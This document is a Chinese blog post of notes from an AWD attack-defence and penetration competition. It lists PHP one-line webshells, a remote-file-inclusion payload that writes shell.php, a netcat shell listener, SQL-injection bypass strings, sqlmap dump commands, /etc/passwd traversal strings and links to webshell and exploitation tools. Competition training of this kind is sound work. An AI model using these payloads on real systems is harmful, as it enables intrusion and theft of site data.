AWD
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAzNvwVZ2x2bzNXak9CX90TQNNkRrFlQKBTSvwFbslmZvwFMwQzLcVmepNHdu9mZvwFVywUNMZTY18CX052bm9CX0UEVPBTRU1UeRpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2LcRHelR3LcJzLctmch1mclRXY39zM0QTMxQDM0EDMykDM4EDMy8CX0Vmbu4GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.jpg)
記錄一下自己最近參加的線下攻防比賽,沒時間學習了,就準備了幾天,果然不出意外的被安全專業的大佬打得很慘。
缺點是不會攻擊,我和我隊友兩個人就隻有防,AWD防了400分,綜合滲透拿了200分。
感覺自己的知識欠差很多,代碼審計能力弱,寫腳本能力弱,sql注入我一直學不會。最重要的是比賽前沒有真正練習過,是以比賽時才沒把技能發揮出來。謹記:多實踐,學好代碼審計,sql注入,手動寫腳本!!
比完賽才對這兩種比賽模式有了清晰的了解。
AWD就是每隊有自己要維護的幾台linux靶機,為低權限或者www權限,對自己的網站進行防守,對他人進行攻擊。
綜合滲透分外網,内網,專網,需要先滲透外網,在讓外網作為跳闆機通路内網,專網。
給了兩個靶機是永恒之藍漏洞,但比賽時沒想到,就沒法做,還有一台直接ssh登陸,就有幾個flag。
比賽特别好,服務特别好,邊打比賽,還有水果吃,住的飯店,夥食很棒。對這次比賽滿意,也漲了很多經驗,督促自己如何去學習。下面是比賽時的源碼。内附很多比賽之前看的網站,
一、ssh登陸,修改密碼超級複雜,mobaxterm,xshell。
普通使用者提權成root,根據kernel版本号找到對應的poc,exp提權。
二、下載下傳源碼,備份,/var/www/html 目錄,mobaxterm,winscp,xftp等。
三、預留後門,禦劍,k8飛刀,D盾,掃描目錄,發現後門,注釋代碼。
四、修改資料庫密碼,
> mysql -u root -p
Show databases;
use mysql;
set password for [email protected] = password('123'); 或者
update user set password = PASSWORD('要更換的密碼') where user = 'root';
flush privileges;
show tables;可能有flag。
select * from typecho_flag;
五、關閉不必要的端口,要求的服務端口不能關,
netstat -napt ,lsof -i 檢視端口,
kill -9 PID 殺掉程序
nmap -sV ip位址(-sV參數可以探測目标主機的伺服器版本)
nmap掃描對方開啟的端口,21,22,21,3306,進行爆破,msfconsole進入metasploit ,,,
六、代碼審計 seay源代碼審計好用,
常見漏洞:一句話木馬,SQL注入、檔案包含、檔案上傳,越權通路,指令執行。
- 一句話木馬
防:vim自己的網站php檔案,注釋掉一句話木馬,
<?php @eval($_REQUEST['c']); ?> <?php @eval($_POST['c']); ?>
asp的一句話是:<%eval request("xx")%>
沒有限制檔案上傳類型,允許後門上傳
攻:菜刀連接配接一句話木馬所在php的網站路徑,輸入密碼,即可進入到背景,擷取網站目錄,進而上傳大馬,擷取最高權限webshell。
沒有的話,自行網站檔案上傳一句話木馬,對檔案類型有限制的話需要BurpSuite抓包,修改content type image/php,根據傳回的路徑,連接配接菜刀。
權限維持:1.不死馬, 2. nc反彈shell nc -lp 9999
- SQL注入漏洞
(1)使用者登入,輸入’測試存在sql注入點,萬能密碼 ' or 1='1 弱密碼 admin/admin 火狐插件hackbar
select name,pass from tbAdmin where name='' or 1='1' and pass='123456'
(2)啊D掃描網站sql注入點,sqlmap注入,
比賽時Access資料庫注入點:
http://10.1.14.1/ReadNews.asp?NewsID=20&BigClassID=2&SmallClassID=2
sqlmap -u "url" 檢視系統,版本
sqlmap -u "url" --dbs 爆資料庫
sqlmap -u "url" --tables -D ctf 爆表
sqlmap -u "url" --column -D ctf -T users 爆列
sqlmap -u "url" --dump -D ctf -T users "user_name,user_pass" 爆字段
網站資料庫密碼資訊檔案一般放在config.php中。
3.檔案包含
(1)本地檔案包含
localhost/a.php?file=/flag.txt
(2)遠端檔案包含
localhost/a.php?file=http:ip/echo.txt
利用,上傳一句話木馬
echo.txt 檔案内容,會生成shell.php 内容為一句話木馬。
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xx]);?>");?>
常見的檔案包含函數,include(),include_once(),require(),require_once()
幾種經典的測試方法:
?file=../../../../../etc/passwd 長目錄截斷
?page=file:///etc/passwd 讀取敏感檔案
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/../../../../dir/file.txt
4.越權通路 allow_url_fopen =ON, allow_url_include =ON
水準越權:修改id,通路他人
垂直越權:知道管理背景的url,通過通路,提升權限,擷取資料。
/admin/upload/config.php 越權通路,無需登陸,直接顯示
- 指令執行漏洞
直接調用作業系統指令,常見php函數system,exec,shell_exec
七、網站防禦
上WAF,檔案監控,安全狗,
在檔案頭寫上,require_once(‘waf.php’);
八、日志分析,根據自己攻擊payload去攻擊他人。
寫腳本批量拿flag。
綜合靶場
Nmap掃描靶機,檢視系統,metasploit 漏洞利用,根據相應的系統核心漏洞,提權,
擷取背景密碼,登入背景,根目錄下flag
建立新使用者,添加到管理者組,遠端目标靶機。
可能存在flag的位置:
- 禦劍掃描,輕按兩下網頁打開,存在flag。
- ssh登陸,系統根目錄下,/var/www/html下
- mysql資料庫字段中。
- 遠端主機桌面,檔案夾下。
==================網站合集====================
www.51elab.com/product02.html 易霖博
https://www.anquanke.com/ 安全客 很棒
http://www.freebuf.com/ freebuf
http://www.mumaasp.com/139.html 很厲害的大馬
http://webshell8.com/
http://www.jiaoben.net/wenzhanglist/93.html 腳本之家
==========================
線下賽筆記
https://blog.csdn.net/wy_97/article/details/78148705
http://www.sohu.com/a/211760248_99907709
https://www.anquanke.com/post/id/86984
https://www.anquanke.com/post/id/98574
https://www.anquanke.com/post/id/98653
https://www.anquanke.com/post/id/100991
https://www.anquanke.com/post/id/84675
http://tinyfisher.github.io/security/2017/10/02/CTF
http://www.freebuf.com/articles/web/118149.html
https://blog.csdn.net/like98k/article/details/80261603
=============================
https://www.exploit-db.com/exploits/15620/ 漏洞
http://exploit.linuxnote.org/ 核心漏洞
https://www.cnblogs.com/linuxsec/articles/6110887.html 提權
https://www.cnblogs.com/yuhuLin/p/7027342.html 普通使用者提權
http://www.freebuf.com/sectool/121847.html Linux提權?這四個腳本可以幫助你
https://github.com/Ares-X/AWD-Predator-Framework AWD攻防賽webshell批量利用架構
https://github.com/admintony/Prepare-for-AWD AWD線下賽腳本集合
https://github.com/ssooking/CTFDefense CTFDefense
https://github.com/wupco/weblogger 針對ctf線下賽流量抓取(php)、真實環境流量抓取分析的工具
http://hackblog.cn/post/75.html waf
https://jingyan.baidu.com/article/d45ad148a8338769552b803a.html 安全狗安裝教程
http://www.safedog.cn/website_safedog.html 安全狗linux版:
https://blog.csdn.net/qq_36328915/article/details/79305166 kali中msf常用指令
http://www.freebuf.com/articles/5472.html w3af簡單使用教程
https://www.cnblogs.com/zylq-blog/p/6694566.html 安裝
http://blog.51cto.com/simeon/1981572 MySQL資料庫***及漏洞利用總結
http://blog.51cto.com/diudiu/1678358 SQLmap配合一句話木馬
利用Sqlmap進行Access和MySQL的注入
https://note.youdao.com/share/?id=62ecd676d896139c823591e8a8bcc708&type=note#/